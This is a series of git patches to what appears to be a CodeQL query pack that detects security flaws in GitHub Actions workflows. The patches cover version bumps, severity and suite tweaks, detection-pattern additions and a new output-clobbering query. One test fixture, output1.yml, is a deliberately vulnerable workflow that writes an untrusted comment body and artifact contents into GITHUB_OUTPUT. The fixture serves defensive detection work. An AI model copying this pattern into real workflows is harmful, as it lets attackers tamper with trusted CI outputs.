steps.step0.outputs.value | provenance | | @@ -320,6 +329,16 @@ nodes | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | semmle.label | steps.set-ref.outputs.ref | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | semmle.label | Run Step: set-ref [ref] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 2dffb865d0bc7f2d6ca5d5e9791ec579823633b0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Jul 2024 12:45:34 +0200 Subject: [PATCH 0422/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 75d8cd5d2e0..285ea6e1680 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.22 +version: 0.1.23 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ce8ab4c24dd..a51e583b32c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.22 +version: 0.1.23 groups: [actions, queries] suites: codeql-suites extractor: javascript From 12e78ac4fe4162920e0418129f90a5b2fc8a35ba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Jul 2024 23:37:04 +0200 Subject: [PATCH 0423/1267] fix(regex): update pattern to match both gh and hub commands --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index be0229a77c4..fba33bb8bc8 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -242,7 +242,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and - line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + line.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(line) or containsPullRequestNumber(line)) or From da28f7dc0af47b59f6d0fe29116677e3d1ed3180 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 15:56:47 +0200 Subject: [PATCH 0424/1267] feat(config): add asv to poisonable steps list --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 7f07f696445..1e0abb02d44 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -16,6 +16,7 @@ extensions: # source: https://boostsecurityio.github.io/lotp/ data: - ["ant"] + - ["asv"] - ["awk\\s+-f"] - ["bundle"] - ["cargo"] From bb78bb6f570e6b335c0d25b2986a25c2302c0e81 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:27:00 +0200 Subject: [PATCH 0425/1267] refactor(queries): update severity level for workflow permissions --- ql/src/Security/CWE-275/MissingActionsPermissions.ql | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index 9373bf808e3..ffb217739c7 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -3,7 +3,7 @@ * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow. * @kind problem * @security-severity 5.0 - * @problem.severity warning + * @problem.severity recommendation * @precision high * @id actions/missing-workflow-permissions * @tags actions diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 58561ca6dba..ecdb1d06526 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -3,7 +3,7 @@ * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. * @kind problem * @security-severity 5.0 - * @problem.severity warning + * @problem.severity recommendation * @precision high * @id actions/unpinned-tag * @tags security From ba6ab04dfca19cb6fbd6447e20ac8ad55b8b9ecb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:27:39 +0200 Subject: [PATCH 0426/1267] feat(suite): Remove severity:warning queries from CodeScanning suite --- ql/src/codeql-suites/actions-code-scanning.qls | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index d0fd74736ce..801b22b0005 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -8,12 +8,17 @@ tags contain: - security - maintainability + problem.severity: + - error + - recommendation - include: kind: - diagnostic - exclude: + problem.severity: + - warning tags contain: - experimental - testing From 28cc06e1361d34a35a1e10ccc89ca97547187fb9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:28:09 +0200 Subject: [PATCH 0427/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 285ea6e1680..89923580de5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.23 +version: 0.1.24 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a51e583b32c..776f51b1732 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.23 +version: 0.1.24 groups: [actions, queries] suites: codeql-suites extractor: javascript From eaf034e8cb02b8fd84d14f1ae5e4614ec336c3db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 25 Jul 2024 11:09:02 +0200 Subject: [PATCH 0428/1267] feat(config): Add pipx as poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 1e0abb02d44..e2742fd60a7 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -40,6 +40,7 @@ extensions: - ["phpstan"] - ["pip\\s+install\\s+-r"] - ["pip\\s+install\\s+--requirement"] + - ["pipx\\s+install\\s+\\."] - ["poetry"] - ["pylint"] - ["pytest"] From e3df12d77bd3f4af9c7435d01cd13b39b639db0b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 29 Jul 2024 22:37:47 +0200 Subject: [PATCH 0429/1267] Update Query suite --- .../codeql-suites/actions-code-scanning.qls | 19 ++----------------- 1 file changed, 2 insertions(+), 17 deletions(-) diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index 801b22b0005..ce3ff489335 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -1,26 +1,11 @@ - description: Standard Code Scanning queries for Actions -- queries: . - +- queries: '.' - include: - kind: - - problem - - path-problem - tags contain: - - security - - maintainability problem.severity: - error - recommendation - -- include: - kind: - - diagnostic - - exclude: - problem.severity: - - warning tags contain: - experimental - - testing - debug - - model-generator + From 06ec94e731dd0f4878e937e825345a4f4e5f3f65 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 29 Jul 2024 22:38:42 +0200 Subject: [PATCH 0430/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 89923580de5..395b875e1be 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.24 +version: 0.1.25 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 776f51b1732..290b58482bc 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.24 +version: 0.1.25 groups: [actions, queries] suites: codeql-suites extractor: javascript From da36924bb1098a89adcb425dc5532e966ca90ff2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:26:41 +0200 Subject: [PATCH 0431/1267] feat(queries): Add Output Clobbering query --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../security/OutputClobberingQuery.qll | 103 ++++++++++++++---- .../Security/CWE-077/OutputClobberingHigh.ql | 37 +++++++ .../CWE-094/OutputClobberingMedium.ql | 31 ------ .../CWE-077/.github/workflows/output1.yml | 38 +++++++ .../CWE-077/OutputClobberingHigh.expected | 12 ++ .../CWE-077/OutputClobberingHigh.qlref | 1 + 7 files changed, 168 insertions(+), 56 deletions(-) create mode 100644 ql/src/Security/CWE-077/OutputClobberingHigh.ql delete mode 100644 ql/src/Security/CWE-094/OutputClobberingMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e16bc00f8ea..5d0d45c26c1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -113,7 +113,7 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() and ( - envToSpecialFile(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) or + envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or envToArgInjSink(var_name, run, _) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index f1811ed5762..a67be6e3562 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -1,43 +1,98 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.security.CodeInjectionQuery private import codeql.actions.security.ArtifactPoisoningQuery -import codeql.actions.dataflow.FlowSources +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources -abstract class OutputClobberingSource extends Step { } +abstract class OutputClobberingSink extends DataFlow::Node { } -class RunOutputClobbering extends OutputClobberingSource, Run { - RunOutputClobbering() { - exists(UntrustedArtifactDownloadStep download, string script | - download.getAFollowingStep() = this and - this.getScript() = script and - exists(int i | - script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and - i < count(string line | line = script.splitAt("\n") | line) - 1 +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT + * echo "sha=$(> $GITHUB_OUTPUT + */ +class OutputClobberingFromFileReadSink extends OutputClobberingSink { + OutputClobberingFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string content, string key, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_OUTPUT + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) ) ) } } /** - * A taint-tracking configuration for unsafe user input - * that is used to construct and evaluate a code script. + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_OUTPUT */ -private module OutputClobberingConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source.asExpr() instanceof OutputClobberingSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } - - predicate isAdditionalFlowStep(DataFlow::Node prev, DataFlow::Node succ) { - exists(StepsExpression e | - e.getTarget() = prev.asExpr() and - prev.asExpr() instanceof OutputClobberingSource and - succ.asExpr() = e +class OutputClobberingFromEnvVarSink extends OutputClobberingSink { + OutputClobberingFromEnvVarSink() { + exists(Run run, string var_name, string key | + envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } -/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +class OutputClobberingFromMaDSink extends OutputClobberingSink { + OutputClobberingFromMaDSink() { madSink(this, "output-clobbering") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module OutputClobberingConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = "branch" + } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputClobberingSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ module OutputClobberingFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-077/OutputClobberingHigh.ql b/ql/src/Security/CWE-077/OutputClobberingHigh.ql new file mode 100644 index 00000000000..a7016a50c58 --- /dev/null +++ b/ql/src/Security/CWE-077/OutputClobberingHigh.ql @@ -0,0 +1,37 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity error + * @security-severity 7.3 + * @precision high + * @id actions/output-clobbering/high + * @tags actions + * security + * experimental + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import codeql.actions.dataflow.ExternalFlow +import OutputClobberingFlow::PathGraph + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + ( + sink.getNode() instanceof OutputClobberingFromFileReadSink or + madSink(sink.getNode(), "output-clobbering") + ) + ) +select sink.getNode(), source, sink, "Potential clobbering of a step output in $@.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-094/OutputClobberingMedium.ql b/ql/src/Security/CWE-094/OutputClobberingMedium.ql deleted file mode 100644 index 7094a7891da..00000000000 --- a/ql/src/Security/CWE-094/OutputClobberingMedium.ql +++ /dev/null @@ -1,31 +0,0 @@ -/** - * @name Output Clobbering - * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. - * @kind path-problem - * @problem.severity warning - * @security-severity 5.0 - * @precision medium - * @id actions/output-clobbering/medium - * @tags actions - * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 - */ - -import actions -import codeql.actions.security.OutputClobberingQuery -import OutputClobberingFlow::PathGraph - -from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink -where - OutputClobberingFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and - // exclude cases where the sink is a JS script and the expression uses toJson - not exists(UsesStep script | - script.getCallee() = "actions/github-script" and - script.getArgumentExpr("script") = sink.getNode().asExpr() and - exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) - ) -select sink.getNode(), source, sink, "Potential output clobbering leading to code injection in $@.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml new file mode 100644 index 00000000000..df583724998 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml @@ -0,0 +1,38 @@ +on: + issue_comment: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + - id: clob2 + run: | + echo ${{ steps.clob1.outputs.OUTPUT_1 }} + echo ${{ steps.clob1.outputs.OUTPUT_2 }} + test2: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # NOT VULNERABLE + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + test3: + runs-on: ubuntu-latest + steps: + - name: Download artifact + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + name: pr_number + - id: clob1 + run: | + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected new file mode 100644 index 00000000000..ea3261450ec --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected @@ -0,0 +1,12 @@ +edges +| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | +nodes +| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +subpaths +#select +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref new file mode 100644 index 00000000000..5af047eec9e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref @@ -0,0 +1 @@ +Security/CWE-077/OutputClobberingHigh.ql From f5261237a46cc27d3b474f5831813eff2de1081e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:27:28 +0200 Subject: [PATCH 0432/1267] feat(suites): Add a bughalla-specific query suite --- ql/src/codeql-suites/actions-bughalla.qls | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 ql/src/codeql-suites/actions-bughalla.qls diff --git a/ql/src/codeql-suites/actions-bughalla.qls b/ql/src/codeql-suites/actions-bughalla.qls new file mode 100644 index 00000000000..0d718fac616 --- /dev/null +++ b/ql/src/codeql-suites/actions-bughalla.qls @@ -0,0 +1,6 @@ +- description: Bughalla queries for Actions +- queries: '.' +- exclude: + tags contain: + - debug + From bf10603b5fafdfe75c10c0d786c4aeb4eccb4078 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:28:15 +0200 Subject: [PATCH 0433/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 395b875e1be..7daf7247f25 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.25 +version: 0.1.26 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 290b58482bc..b844148e7a2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.25 +version: 0.1.26 groups: [actions, queries] suites: codeql-suites extractor: javascript From 65ad387543d2aba815f7aa4966e81b82c0868963 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 18:18:22 +0200 Subject: [PATCH 0434/1267] fix: Add printf as an equivalent to echo --- ql/lib/codeql/actions/Helper.qll | 22 +++++++++---------- .../security/EnvPathInjectionQuery.qll | 3 ++- .../actions/security/EnvVarInjectionQuery.qll | 3 ++- .../security/OutputClobberingQuery.qll | 3 ++- 4 files changed, 17 insertions(+), 14 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index b08b62c8a58..cd964a6621d 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -74,7 +74,7 @@ predicate extractVariableAndValue(string raw_content, string key, string value) bindingset[script] predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?i)(echo|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + regexp = "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and file = trimQuotes(script.regexpCapture(regexp, 4)) and filters = "" and @@ -85,12 +85,12 @@ predicate singleLineFileWrite(string script, string cmd, string file, string con bindingset[script] predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { exists(string regexp | - regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = script.regexpCapture(regexp, 4) and value = trimQuotes(script.regexpCapture(regexp, 5)) or - regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = "" and value = trimQuotes(script.regexpCapture(regexp, 4)) @@ -119,17 +119,17 @@ bindingset[script] predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | regexp = - "(?msi).*(echo\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - 